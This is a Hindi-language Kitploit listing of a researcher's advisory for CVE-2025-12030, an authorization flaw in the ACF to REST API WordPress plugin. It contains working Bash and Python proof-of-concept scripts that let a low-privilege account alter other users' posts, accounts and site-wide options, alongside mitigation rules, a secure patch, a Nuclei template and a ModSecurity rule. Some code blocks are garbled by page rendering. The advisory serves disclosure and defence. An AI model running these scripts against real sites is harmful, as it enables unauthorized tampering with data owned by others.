Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-12030 — ACF to REST API WordPress Plugin IDOR Vulnerability (CVE-2025-12030) - सुरक्षा दोष जो प्रमाणित उपयोगकर्ताओं को Contributor-स्तर की पहुंच के साथ उन वस्तुओं पर ACF फ़ील्ड्स को संशोधित करने की अनुमति देता है जिनके वे मालिक नहीं हैं। | Kitploit
उपकरण/GitHubGitHub/snailsploit/cve-2025-12030
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubsnailsploit/cve-2025-12030

CVE-2025-12030

ACF to REST API WordPress Plugin IDOR Vulnerability (CVE-2025-12030) - सुरक्षा दोष जो प्रमाणित उपयोगकर्ताओं को Contributor-स्तर की पहुंच के साथ उन वस्तुओं पर ACF फ़ील्ड्स को संशोधित करने की अनुमति देता है जिनके वे मालिक नहीं हैं।

रिपॉजिटरी देखें
13 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-12030: ACF to REST API WordPress प्लगइन में असुरक्षित प्रत्यक्ष वस्तु संदर्भ

CVE CVSS Score WordPress Plugin CWE-639 Wordfence

कीवर्ड: CVE-2025-12030, ACF to REST API vulnerability, IDOR, WordPress security, authenticated exploit, WordPress plugin vulnerability, CWE-639, ACF field modification, authorization bypass, WordPress CVE 2025, Advanced Custom Fields, REST API security

विषयसूची

  • अवलोकन
  • कमजोरी विवरण
  • तकनीकी विश्लेषण
  • हमला वेक्टर
  • प्रूफ ऑफ कॉन्सेप्ट
  • सुधार मार्गदर्शिका
  • पता लगाना
  • CVSS मीट्रिक्स
  • संदर्भ
  • क्रेडिट
  • सुरक्षा संपर्क

अवलोकन

ACF to REST API WordPress प्लगइन IDOR कमजोरी (CVE-2025-12030) - एक सुरक्षा दोष जो योगदानकर्ता-स्तरीय पहुँच वाले प्रमाणित उपयोगकर्ताओं को उन वस्तुओं पर ACF फ़ील्ड बदलने की अनुमति देता है जिनके वे स्वामी नहीं हैं।

ACF to REST API WordPress प्लगइन में एक असुरक्षित प्रत्यक्ष वस्तु संदर्भ (IDOR) कमजोरी पाई गई है जो न्यूनतम विशेषाधिकारों वाले प्रमाणित हमलावरों को संपूर्ण WordPress इंस्टॉलेशन में ACF फ़ील्ड बदलने की अनुमति देती है।

खोजकर्ता: Kai Aizen (SnailSploit)
प्रकाशित: 6 जनवरी, 2026
CVSS स्कोर: 4.3 (मध्यम)
CWE: CWE-639 - उपयोगकर्ता-नियंत्रित कुंजी के माध्यम से प्राधिकरण बाईपास
प्लगइन: ACF to REST API
प्लगइन स्लग: acf-to-rest-api
हमला प्रकार: असुरक्षित प्रत्यक्ष वस्तु संदर्भ (IDOR)
आवश्यक विशेषाधिकार: योगदानकर्ता+ (प्रमाणित हमला)

कमजोरी विवरण

विवरण

WordPress के लिए ACF to REST API प्लगइन संस्करण 3.3.4 तक (और सहित) सभी संस्करणों में असुरक्षित प्रत्यक्ष वस्तु संदर्भ के प्रति संवेदनशील है। यह update_item_permissions_check() विधि में अपर्याप्त क्षमता जाँच के कारण है, जो केवल यह सत्यापित करता है कि वर्तमान उपयोगकर्ता के पास edit_posts क्षमता है, बिना वस्तु-विशिष्ट अनुमतियों (जैसे edit_post($id), edit_user($id), manage_options) की जाँच किए।

प्रभाव

यह कमजोरी योगदानकर्ता-स्तर और उससे ऊपर की पहुँच वाले प्रमाणित हमलावरों को निम्नलिखित की अनुमति देती है:

  • उन पोस्ट पर ACF फ़ील्ड बदलना जिनके वे स्वामी नहीं हैं - पोस्ट स्वामित्व प्रतिबंधों को बायपास करना
  • किसी भी उपयोगकर्ता खाते पर ACF फ़ील्ड बदलना - प्रशासक खातों सहित
  • टिप्पणियों पर ACF फ़ील्ड बदलना - टिप्पणी मेटाडेटा बदलना
  • वर्गीकरण शर्तों पर ACF फ़ील्ड बदलना - श्रेणी/टैग कस्टम फ़ील्ड बदलना
  • वैश्विक विकल्प पृष्ठ बदलना - manage_options क्षमता के बिना साइट-व्यापी ACF विकल्पों तक पहुँचना

ये सभी संशोधन /wp-json/acf/v3/{type}/{id} REST API एंडपॉइंट के माध्यम से संभव हैं।

प्रभावित संस्करण

  • कमजोर: सभी संस्करण ≤ 3.3.4
  • पैच किया गया: ⚠️ कोई ज्ञात पैच उपलब्ध नहीं

CVSS v3.1 मीट्रिक्स```

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

root@kitploit:~
| मीट्रिक | मान |
|--------|-------|
| हमला वेक्टर | Network (AV:N) |
| हमला जटिलता | Low (AC:L) |
| आवश्यक विशेषाधिकार | Low (PR:L) |
| उपयोगकर्ता सहभागिता | None (UI:N) |
| दायरा | Unchanged (S:U) |
| गोपनीयता | None (C:N) |
| अखंडता | Low (I:L) |
| उपलब्धता | None (A:N) |

**CVSS v3.1 विघटन:**

- **हमला वेक्टर (AV):** Network - इस कमजोरी का नेटवर्क के माध्यम से दूरस्थ रूप से शोषण किया जा सकता है
- **हमला जटिलता (AC):** Low - शोषण के लिए किसी विशेष परिस्थिति की आवश्यकता नहीं है
- **आवश्यक विशेषाधिकार (PR):** Low - Contributor-स्तर के प्रमाणीकरण की आवश्यकता है
- **उपयोगकर्ता सहभागिता (UI):** None - शोषण बिना किसी उपयोगकर्ता सहभागिता के काम करता है
- **दायरा (S):** Unchanged - कमजोरी केवल संवेदनशील घटक को प्रभावित करती है
- **गोपनीयता प्रभाव (C):** None - कोई सूचना प्रकटीकरण नहीं
- **अखंडता प्रभाव (I):** Low - ACF फ़ील्ड का अनधिकृत संशोधन
- **उपलब्धता प्रभाव (A):** None - कोई उपलब्धता प्रभाव नहीं

## तकनीकी विवरण

### कमजोरी का मूल कारण

यह कमजोरी `update_item_permissions_check()` विधि में मौजूद है, जो अपर्याप्त प्राधिकरण प्रदान करती है:

```php
protected function update_item_permissions_check( $object ) {
``````php
// Vulnerable code pattern (simplified)
public function update_item_permissions_check( $request ) {
    // VULNERABLE: Only checks generic edit_posts capability
    if ( current_user_can( 'edit_posts' ) ) {
        return true;
    }
    return false;
}

सही कार्यान्वयन को ऑब्जेक्ट-विशिष्ट अनुमतियों की जांच करनी चाहिए:```php // Secure implementation pattern public function update_item_permissions_check( $request ) { $id = $request->get_param( 'id' ); $type = $request->get_param( 'type' );

root@kitploit:~
switch ( $type ) {
    case 'post':
        return current_user_can( 'edit_post', $id );
    case 'user':
        return current_user_can( 'edit_user', $id );
    case 'option':
        return current_user_can( 'manage_options' );
    // ... other object types
}
return false;

}

root@kitploit:~
### कमजोर एंडपॉइंट्स

| Endpoint | लक्ष्य | आवश्यक क्षमता (होनी चाहिए) |
|----------|--------|--------------------------------|
| `/wp-json/acf/v3/posts/{id}` | पोस्ट्स | `edit_post($id)` |
| `/wp-json/acf/v3/pages/{id}` | पेजेस | `edit_page($id)` |
| `/wp-json/acf/v3/users/{id}` | उपयोगकर्ता | `edit_user($id)` |
| `/wp-json/acf/v3/comments/{id}` | टिप्पणियाँ | `edit_comment($id)` |
| `/wp-json/acf/v3/terms/{taxonomy}/{id}` | टर्म्स | `edit_term($id)` |
| `/wp-json/acf/v3/options/{option}` | विकल्प | `manage_options` |

### हमला वेक्टर```
PUT/POST /wp-json/acf/v3/{type}/{id}
Authorization: Basic <contributor_credentials>
Content-Type: application/json

{
    "fields": {
        "field_name": "malicious_value"
    }
}

यह कमजोरी वर्डप्रेस REST API के माध्यम से किसी भी प्रमाणित उपयोगकर्ता द्वारा शोषित की जा सकती है जिसके पास कम से कम योगदानकर्ता भूमिका हो।

Proof of Concept

⚠️ केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए

Bash PoC```bash

#!/bin/bash

CVE-2025-12030 PoC - ACF to REST API IDOR

TARGET_URL="$1" USERNAME="$2" APP_PASSWORD="$3" TARGET_POST_ID="$4"

if [ -z "$TARGET_URL" ] || [ -z "$USERNAME" ] || [ -z "$APP_PASSWORD" ] || [ -z "$TARGET_POST_ID" ]; then echo "Usage: $0 <target_url> <app_password> <post_id>" echo "Example: $0 https://example.com contributor_user xxxx-xxxx-xxxx 42" exit 1 fi

echo "[] CVE-2025-12030 - ACF to REST API IDOR PoC" echo "[] Target: $TARGET_URL" echo "[*] Target Post ID: $TARGET_POST_ID" echo ""

Encode credentials

AUTH=$(echo -n "$USERNAME:$APP_PASSWORD" | base64)

Step 1: Read current ACF fields (verify access)

echo "[*] Step 1: Reading current ACF fields..." curl -s -X GET "$TARGET_URL/wp-json/acf/v3/posts/$TARGET_POST_ID"
-H "Authorization: Basic $AUTH"
| python3 -m json.tool

echo ""

Step 2: Attempt to modify ACF fields on post we don't own

echo "[*] Step 2: Attempting to modify ACF fields on post $TARGET_POST_ID..." RESPONSE=$(curl -s -X POST "$TARGET_URL/wp-json/acf/v3/posts/$TARGET_POST_ID"
-H "Authorization: Basic $AUTH"
-H "Content-Type: application/json"
-d '{"fields":{"test_field":"CVE-2025-12030_IDOR_TEST"}}')

echo "$RESPONSE" | python3 -m json.tool

echo "" if echo "$RESPONSE" | grep -q "CVE-2025-12030_IDOR_TEST"; then echo "[!] VULNERABLE: Successfully modified ACF fields on post we don't own!" else echo "[+] Not vulnerable or modification failed" fi

root@kitploit:~
### Python PoC```python
#!/usr/bin/env python3
"""
CVE-2025-12030 - ACF to REST API IDOR PoC
For educational and authorized testing purposes only
"""

import requests
import sys
import json
import base64

def exploit(target_url, username, app_password, target_id, target_type="posts"):
    """
    Exploit CVE-2025-12030 IDOR vulnerability
    
    Args:
        target_url: WordPress site URL
        username: Contributor-level username
        app_password: Application password
        target_id: ID of the object to modify (post, user, etc.)
        target_type: Type of object (posts, pages, users, options, etc.)
    """
    
    api_endpoint = f"{target_url.rstrip('/')}/wp-json/acf/v3/{target_type}/{target_id}"
    
    # Create Basic Auth header
    credentials = base64.b64encode(f"{username}:{app_password}".encode()).decode()
    headers = {
        "Authorization": f"Basic {credentials}",
        "Content-Type": "application/json"
    }
    
    print(f"[*] CVE-2025-12030 - ACF to REST API IDOR PoC")
    print(f"[*] Target: {target_url}")
    print(f"[*] Endpoint: {api_endpoint}")
    print(f"[*] Object Type: {target_type}")
    print(f"[*] Object ID: {target_id}\n")
    
    # Step 1: Read current ACF fields
    print("[*] Step 1: Reading current ACF fields...")
    try:
        response = requests.get(api_endpoint, headers=headers, timeout=10)
        if response.status_code == 200:
            print(f"[+] Current ACF fields:")
            print(json.dumps(response.json(), indent=2))
        else:
            print(f"[-] Failed to read fields: {response.status_code}")
            print(response.text)
    except requests.RequestException as e:
        print(f"[-] Error reading fields: {e}")
        return
    
    print("")
    
    # Step 2: Attempt IDOR modification
    print("[*] Step 2: Attempting unauthorized modification...")
    
    payload = {
        "fields": {
            "idor_test": "CVE-2025-12030_IDOR_VERIFIED"
        }
    }
    
    try:
        response = requests.post(api_endpoint, headers=headers, json=payload, timeout=10)
        
        if response.status_code == 200:
            result = response.json()
            print(f"[+] Response:")
            print(json.dumps(result, indent=2))
            
            if "CVE-2025-12030_IDOR_VERIFIED" in str(result):
                print("\n[!] VULNERABLE: Successfully modified ACF fields via IDOR!")
                print("[!] Contributor-level user was able to modify objects they don't own!")
            else:
                print("\n[+] Modification request accepted - verify manually")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            print(f"Response: {response.text}")
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

def test_options_page(target_url, username, app_password):
    """Test modification of global options page (requires manage_options normally)"""
    
    api_endpoint = f"{target_url.rstrip('/')}/wp-json/acf/v3/options/options"
    
    credentials = base64.b64encode(f"{username}:{app_password}".encode()).decode()
    headers = {
        "Authorization": f"Basic {credentials}",
        "Content-Type": "application/json"
    }
    
    print(f"\n[*] Testing Options Page IDOR...")
    print(f"[*] Endpoint: {api_endpoint}")
    print(f"[*] NOTE: This normally requires manage_options capability!\n")
    
    payload = {
        "fields": {
            "site_option_test": "CVE-2025-12030_OPTIONS_IDOR"
        }
    }
    
    try:
        response = requests.post(api_endpoint, headers=headers, json=payload, timeout=10)
        
        if response.status_code == 200:
            print(f"[!] CRITICAL: Contributor modified global options page!")
            print(json.dumps(response.json(), indent=2))
        else:
            print(f"[-] Options modification failed: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: {sys.argv[0]} <target_url> <username> <app_password> <target_id> [type]")
        print(f"Example: {sys.argv[0]} https://example.com contributor xxxx-xxxx 42 posts")
        print(f"\nSupported types: posts, pages, users, comments, options")
        sys.exit(1)
    
    target_url = sys.argv[1]
    username = sys.argv[2]
    app_password = sys.argv[3]
    target_id = sys.argv[4]
    target_type = sys.argv[5] if len(sys.argv) > 5 else "posts"
    
    exploit(target_url, username, app_password, target_id, target_type)
    
    # Also test options page access
    if target_type != "options":
        test_options_page(target_url, username, app_password)

उपचार

साइट प्रशासकों के लिए

तत्काल कार्रवाई आवश्यक:

⚠️ इस कमजोरी के लिए फिलहाल कोई आधिकारिक पैच उपलब्ध नहीं है।

  1. प्लगइन को अनइंस्टॉल करने पर विचार करें यदि ACF REST API कार्यक्षमता महत्वपूर्ण नहीं है
  2. उपयोगकर्ता पंजीकरण प्रतिबंधित करें और मौजूदा Contributor+ खातों की समीक्षा करें
  3. WAF नियम लागू करें अनधिकृत REST API संशोधनों को ब्लॉक करने के लिए
  4. REST API गतिविधि की निगरानी करें संदिग्ध ACF फ़ील्ड संशोधनों के लिए
  5. उचित प्राधिकरण नियंत्रण वाले वैकल्पिक प्लगइन्स पर विचार करें

अस्थायी शमन उपाय

विकल्प 1: कोड के माध्यम से REST API एंडपॉइंट अक्षम करें

अपनी थीम के functions.php या एक कस्टम प्लगइन में जोड़ें:```php

403) ); } return $permission; }, 10, 3); ``` #### विकल्प 2: .htaccess के माध्यम से प्रतिबंधित करें```apache # Block ACF REST API modification endpoints for non-admins RewriteEngine On RewriteCond %{REQUEST_METHOD} ^(PUT|POST|PATCH)$ RewriteCond %{REQUEST_URI} ^/wp-json/acf/v3/ [NC] RewriteCond %{HTTP_COOKIE} !wordpress_logged_in_.*admin [NC] RewriteRule .* - [F,L] ``` #### विकल्प 3: Nginx Configuration```nginx # Block ACF REST API modification requests location ~* ^/wp-json/acf/v3/ { if ($request_method ~* "(PUT|POST|PATCH)") { # Implement proper authorization check or block entirely return 403; } try_files $uri $uri/ /index.php?$args; } ``` ### प्लगइन डेवलपर्स के लिए यदि प्लगइन को फोर्क या पैच कर रहे हैं, तो उचित ऑब्जेक्ट-विशिष्ट प्राधिकरण लागू करें:```php get_param( 'id' ); $type = $this->get_object_type( $request ); switch ( $type ) { case 'post': case 'page': // Check if user can edit THIS specific post if ( ! current_user_can( 'edit_post', $id ) ) { return new WP_Error( 'rest_cannot_edit', __( 'Sorry, you are not allowed to edit this post.' ), array( 'status' => rest_authorization_required_code() ) ); } break; case 'user': // Check if user can edit THIS specific user if ( ! current_user_can( 'edit_user', $id ) ) { return new WP_Error( 'rest_cannot_edit', __( 'Sorry, you are not allowed to edit this user.' ), array( 'status' => rest_authorization_required_code() ) ); } break; case 'option': // Options require manage_options capability if ( ! current_user_can( 'manage_options' ) ) { return new WP_Error( 'rest_cannot_edit', __( 'Sorry, you are not allowed to manage options.' ), array( 'status' => rest_authorization_required_code() ) ); } break; case 'term': $taxonomy = $request->get_param( 'taxonomy' ); $tax_obj = get_taxonomy( $taxonomy ); if ( ! current_user_can( $tax_obj->cap->edit_terms ) ) { return new WP_Error( 'rest_cannot_edit', __( 'Sorry, you are not allowed to edit terms.' ), array( 'status' => rest_authorization_required_code() ) ); } break; case 'comment': if ( ! current_user_can( 'edit_comment', $id ) ) { return new WP_Error( 'rest_cannot_edit', __( 'Sorry, you are not allowed to edit this comment.' ), array( 'status' => rest_authorization_required_code() ) ); } break; default: return new WP_Error( 'rest_invalid_type', __( 'Invalid object type.' ), array( 'status' => 400 ) ); } return true; } ``` ## पहचान ### लॉग विश्लेषण संदिग्ध REST API गतिविधि की खोज करें:```bash # Search access logs for ACF REST API modification attempts grep -E "POST|PUT|PATCH.*wp-json/acf/v3" /var/log/nginx/access.log grep -E "POST|PUT|PATCH.*wp-json/acf/v3" /var/log/apache2/access.log ``` ### WordPress प्लगइन जाँच```bash # Check if vulnerable version is installed wp plugin list | grep -i "acf-to-rest-api" # Get plugin version wp plugin get acf-to-rest-api --field=version ``` ### सुरक्षा स्कैनर नियम **Nuclei टेम्पलेट:**```yaml id: CVE-2025-12030 info: name: ACF to REST API - IDOR ACF Field Modification author: SnailSploit severity: medium description: ACF to REST API plugin for WordPress is vulnerable to IDOR reference: - https://github.com/SnailSploit/CVE-2025-12030 - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-to-rest-api/acf-to-rest-api-334-insecure-direct-object-reference-to-authenticated-contributor-acf-fieldoption-modification tags: cve,cve2025,wordpress,wp-plugin,idor,authenticated http: - raw: - | POST /wp-json/acf/v3/posts/1 HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} Content-Type: application/json {"fields":{"nuclei_test":"CVE-2025-12030"}} matchers-condition: and matchers: - type: word words: - "acf" condition: or - type: status status: - 200 ``` ### वेब एप्लिकेशन फ़ायरवॉल नियम **ModSecurity नियम:**```apache # CVE-2025-12030 - Block unauthorized ACF REST API modifications SecRule REQUEST_URI "@rx ^/wp-json/acf/v3/" \ "id:2025012030,\ phase:2,\ t:none,t:urlDecodeUni,t:normalizePathWin,\ chain,\ deny,\ status:403,\ log,\ msg:'CVE-2025-12030 - Potential ACF IDOR Exploit Attempt'" SecRule REQUEST_METHOD "@rx ^(POST|PUT|PATCH)$" "t:none" ``` ## समयरेखा - **जनवरी 6, 2026** - कमजोरी सार्वजनिक रूप से प्रकट की गई - **जनवरी 6, 2026** - CVE-2025-12030 निर्धारित किया गया - **वर्तमान** - ⚠️ कोई पैच उपलब्ध नहीं है ## संदर्भ - [Wordfence Intelligence - CVE-2025-12030](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-to-rest-api/acf-to-rest-api-334-insecure-direct-object-reference-to-authenticated-contributor-acf-fieldoption-modification) - [WordPress Plugin Trac - ACF to REST API](https://plugins.trac.wordpress.org/browser/acf-to-rest-api) - [WordPress Plugin Directory](https://wordpress.org/plugins/acf-to-rest-api/) - [CWE-639 - उपयोगकर्ता-नियंत्रित कुंजी के माध्यम से प्राधिकरण बाईपास](https://cwe.mitre.org/data/definitions/639.html) - [OWASP - असुरक्षित प्रत्यक्ष वस्तु संदर्भ](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/04-Testing_for_Insecure_Direct_Object_References) ## श्रेय **शोधकर्ता:** - [**Kai Aizen**](https://linkedin.com/in/kaiaizen) - [SnailSploit](https://snailsploit.com) **प्रकटीकरण प्रक्रिया:** Wordfence बग बाउंटी कार्यक्रम के माध्यम से समन्वित ## अस्वीकरण यह जानकारी केवल सुरक्षा अनुसंधान और रक्षात्मक उद्देश्यों के लिए प्रदान की गई है। इस कमजोरी का दुर्भावनापूर्ण उद्देश्यों के लिए कोई भी शोषण अवैध और अनैतिक है। हमेशा उन प्रणालियों का परीक्षण करने से पहले उचित प्राधिकरण प्राप्त करें जो आपके स्वामित्व में नहीं हैं। ## संपर्क इस कमजोरी के बारे में प्रश्नों या अतिरिक्त जानकारी के लिए: - **ईमेल:** [[email protected]](mailto:[email protected]) - **वेबसाइट:** [snailsploit.com](https://snailsploit.com) - **संगठन:** SnailSploit Security Research --- *अंतिम अद्यतन: जनवरी 6, 2026* --- ## 📚 दस्तावेज़ीकरण और लेखक इस प्रोजेक्ट का पूरा विवरण, पद्धति और संबंधित शोध यहां उपलब्ध है: **[https://snailsploit.com/security-research/cves/cve-2025-12030/](https://snailsploit.com/security-research/cves/cve-2025-12030/)** **Kai Aizen** द्वारा निर्मित — स्वतंत्र आक्रामक सुरक्षा शोधकर्ता। [snailsploit.com](https://snailsploit.com) · [शोध](https://snailsploit.com/research) · [फ्रेमवर्क](https://snailsploit.com/frameworks) · [GitHub](https://github.com/SnailSploit) · [LinkedIn](https://linkedin.com/in/kaiaizen) · [ResearchGate](https://www.researchgate.net/profile/Kai-Aizen-2) · [X/Twitter](https://x.com/SnailSploit) > *एक ही हमला। अलग सब्सट्रेट।*
टूल डाउनलोड करें